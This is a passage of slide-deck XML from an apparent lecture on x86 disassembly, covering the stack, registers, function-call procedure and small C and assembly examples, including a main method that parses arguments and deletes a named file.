                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr sz="2000"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
              </a:tr>
              <a:tr h="652875">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2600">
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                          <a:cs typeface="Teko"/>
                          <a:sym typeface="Teko"/>
                        </a:rPr>
                        <a:t>repne scasb</a:t>
                      </a:r>
                      <a:endParaRPr sz="2600">
                        <a:latin typeface="Teko"/>
                        <a:ea typeface="Teko"/>
                        <a:cs typeface="Teko"/>
                        <a:sym typeface="Teko"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000"/>
                        <a:t>Search a data buffer for a single byte. Repeat until ECX=0</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000"/>
                        <a:t> or byte not found.</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>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85"/>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X86 Disassembly</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="859" name="Google Shape;859;p85"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179513" y="1196752"/>
            <a:ext cx="5616624" cy="5112568"/>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b="1" lang="en-GB"/>
              <a:t>The Stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: LIFO structure for storing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="444"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Local variables of functions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="444"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Parameters of functions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="444"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Flow control of the program</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="3" marL="1600200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="370"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Return Address</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="518"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Uses registers</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="444"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>ESP: stack pointer</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="3" marL="1600200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="370"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Address of the top of the stack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="444"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>EBP: base pointer</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="3" marL="1600200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="370"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Keep track of the location of local variables and parameters</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="518"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Instructions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="2" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="555"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3000">
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>Enter, push</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000">
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>pop, call, leave, ret</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Teko"/>
              <a:ea typeface="Teko"/>
              <a:cs typeface="Teko"/>
              <a:sym typeface="Teko"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="860" name="Google Shape;860;p85"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5940152" y="1728029"/>
            <a:ext cx="2592288" cy="4293259"/>
            <a:chOff x="5940152" y="2097361"/>
            <a:chExt cx="2592288" cy="4293259"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="861" name="Google Shape;861;p85"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5940152" y="2492896"/>
              <a:ext cx="2592288" cy="3528392"/>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2" name="Google Shape;862;p85"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6156176" y="3361398"/>
              <a:ext cx="2160240" cy="648072"/>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3" name="Google Shape;863;p85"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6131385" y="4257092"/>
              <a:ext cx="2160240" cy="648072"/>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4" name="Google Shape;864;p85"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6146463" y="5144481"/>
              <a:ext cx="2160240" cy="648072"/>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5" name="Google Shape;865;p85"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6191715" y="3500768"/>
              <a:ext cx="20891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lt1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>Current Stack Frame</a:t>
              </a:r>
              <a:endParaRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="866" name="Google Shape;866;p85"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6164088" y="4396462"/>
              <a:ext cx="20535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lt1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>Caller’s Stack Frame</a:t>
              </a:r>
              <a:endParaRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="867" name="Google Shape;867;p85"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6106196" y="5283851"/>
              <a:ext cx="22102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lt1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>Caller’s Caller’s Stack Frame</a:t>
              </a:r>
              <a:endParaRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="868" name="Google Shape;868;p85"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6128501" y="2097361"/>
              <a:ext cx="222734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Low Memory Address</a:t>
              </a:r>
              <a:endParaRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="869" name="Google Shape;869;p85"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6070034" y="6021288"/>
              <a:ext cx="22715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High Memory Address</a:t>
              </a:r>
              <a:endParaRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>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pic>
        <p:nvPicPr>
          <p:cNvPr descr="Image result for function call in stack" id="875" name="Google Shape;875;p86"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4788024" y="2178209"/>
            <a:ext cx="4265712" cy="3199284"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="876" name="Google Shape;876;p86"/>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X86 Disassembly</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="877" name="Google Shape;877;p86"/>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b="1" lang="en-GB"/>
              <a:t>The Stack 🡪 Function call procedure</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>1. Push arguments into the stack; </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>2. Call function; </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="2" marL="857250" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1600"/>
              <a:t>Call</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600"/>
              <a:t> [memory location]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="2" marL="857250" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1600"/>
              <a:t>Push</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600"/>
              <a:t> return address</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>3. Allocate space for local variable </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>	&amp; Set base pointer EBP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>4. Perform function 🡪 EAX</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>5. Restore stack to be free</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB" sz="2000"/>
              <a:t>Leave</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t> instruction (set ESP=EBP)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>6. Return to the previous (original)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB" sz="2000"/>
              <a:t>Ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t> instruction (pop Return addr. to EIP)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>7. Remove arguments</a:t>
            </a:r>
            <a:endParaRPr sz="20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87"/>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X86 Disassembly</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="883" name="Google Shape;883;p87"/>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Function call example</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="884" name="Google Shape;884;p87"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1403648" y="2636912"/>
            <a:ext cx="2451761" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="C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int test(int x, int y, int z);</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int a, b, c, result;</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result = test(a, b, c);</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="885" name="Google Shape;885;p87"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5940152" y="2132856"/>
            <a:ext cx="1614801" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt1"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="25400">
            <a:solidFill>
              <a:schemeClr val="accent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push c</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push b</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push a</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call test</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>add esp, 12</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mov result, eax</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="886" name="Google Shape;886;p87"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4499992" y="2852936"/>
            <a:ext cx="936104" cy="504056"/>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88"/>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X86 Disassembly</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="893" name="Google Shape;893;p88"/>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C Main Method and Offsets</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="894" name="Google Shape;894;p88"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="496949" y="1865618"/>
            <a:ext cx="286969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400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>program.exe -r filename.txt</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Teko"/>
              <a:ea typeface="Teko"/>
              <a:cs typeface="Teko"/>
              <a:sym typeface="Teko"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="895" name="Google Shape;895;p88"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467544" y="2780928"/>
            <a:ext cx="3888432" cy="2308324"/>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int main(int argc, char* argv[])</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a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>if (argc != 3) {return 0;}</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>if (strncmp(argv[1], "-r", 2) == 0){</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>DeleteFileA(argv[2]);</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return 0;</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a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="896" name="Google Shape;896;p88"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4716016" y="1420264"/>
